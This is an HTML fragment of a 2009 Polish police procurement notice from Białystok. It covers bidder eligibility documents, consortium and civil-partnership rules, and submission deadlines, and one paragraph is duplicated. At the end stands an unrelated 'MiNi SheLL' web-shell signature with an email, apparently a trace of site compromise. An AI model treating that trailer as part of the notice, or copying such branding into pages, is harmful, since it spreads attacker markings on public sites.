Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą /spełnia - nie spełnia/..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy PZP oraz o niepodleganiu wykluczeniu z postępowania - załącznik nr 2 SIWZ.
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy PZP oraz o niepodleganiu wykluczeniu z postępowania (w przypadku spółki cywilnej/konsorcjum) - załącznik nr 3 SIWZ.
3.	Aktualny(e) odpis(y) z właściwego rejestru albo aktualne zaświadczenie(nia) o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.
4. W przypadku podmiotów występujących wspólnie - art. 23 ust. 1 (konsorcjum, spółka cywilna):
a)	dot. konsorcjum - Wykonawcy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, jego upoważnienie musi być udokumentowane pełnomocnictwem załączonym do oferty, podpisanym przez upełnomocnionych przedstawicieli wszystkich Wykonawców (pełnomocnictwo powinno być złożone w oryginale lub w kopii potwierdzonej za zgodność z oryginałem przez wszystkich uczestników konsorcjum lub notariusza) wskazujące na podmiot uprawniony do występowania w imieniu całego konsorcjum lub do reprezentowania ich w postępowaniu i zawarcia  umowy w sprawie zamówienia publicznego. Wszelka korespondencja i rozliczenia dokonywane będą wyłącznie z pełnomocnikiem ustanowionym przez Wykonawców. 
Zamawiający zastrzega sobie możliwość zażądania przedstawienia umowy konsorcjum przed podpisaniem umowy o udzielenie zamówienia publicznego, regulującej współpracę Wykonawców.
Dokumenty potwierdzające, że Wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu muszą zostać złożone odrębnie przez każdego z członków konsorcjum - dokumenty określone w pkt IV ppkt  3 specyfikacji istotnych warunków zamówienia. Koncesja, zezwolenie lub licencja, jeżeli jest wymagana, rozpatrywana będzie łącznie. Potencjał techniczny i finansowy uczestników konsorcjum będzie rozpatrywany łącznie. 
Nie złożenie przez któregokolwiek z uczestników konsorcjum w/w dokumentów skutkować będzie wykluczeniem z postępowania konsorcjum, z zastrzeżeniem art. 26 ust. 3 ustawy PZP.   
b)	dot. spółki cywilnej - jeśli działalność prowadzona jest w ramach umowy spółki cywilnej, w ofercie należy złożyć:
- pełnomocnictwo wystawione przez wszystkich wspólników - w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez wszystkich wspólników lub notariusza - wskazujące na osobę uprawnioną do występowania w imieniu spółki cywilnej i do zawarcia umowy w sprawie zamówienia publicznego 
- lub umowę spółki albo kopię umowy spółki potwierdzoną za zgodność z oryginałem przez osoby upoważnione do jej reprezentowania lub notariusza.
Dokumenty potwierdzające, że Wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu muszą zostać złożone odrębnie przez każdego ze wspólników spółki cywilnej - dokumenty określone w pkt IV ppkt 3 specyfikacji istotnych warunków zamówienia. Koncesja, zezwolenie lub licencja, jeżeli jest wymagana, rozpatrywana będzie łącznie. Potencjał techniczny i finansowy wspólników spółki cywilnej będzie rozpatrywany łącznie. 
Dokumenty potwierdzające, że Wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu muszą zostać złożone odrębnie przez każdego ze wspólników spółki cywilnej - dokumenty określone w pkt IV ppkt 3 specyfikacji istotnych warunków zamówienia. Koncesja, zezwolenie lub licencja, jeżeli jest wymagana, rozpatrywana będzie łącznie. Potencjał techniczny i finansowy wspólników spółki cywilnej będzie rozpatrywany łącznie. 
Nie złożenie przez któregokolwiek ze wspólników spółki cywilnej w/w dokumentów skutkować będzie wykluczeniem z postępowania spółki cywilnej, z zastrzeżeniem art. 26 ust. 3 ustawy PZP..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.podlaska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Białymstoku, ul. Sienkiewicza 65, 15-003 Białystok, Zespół ds. Zamówień Publicznych pok. 220.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 09:30, miejsce: Komenda Wojewódzka Policji w Białymstoku, ul. Sienkiewicza 65, 15-003 Białystok, Zespół ds. Zamówień Publicznych pok. 222.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com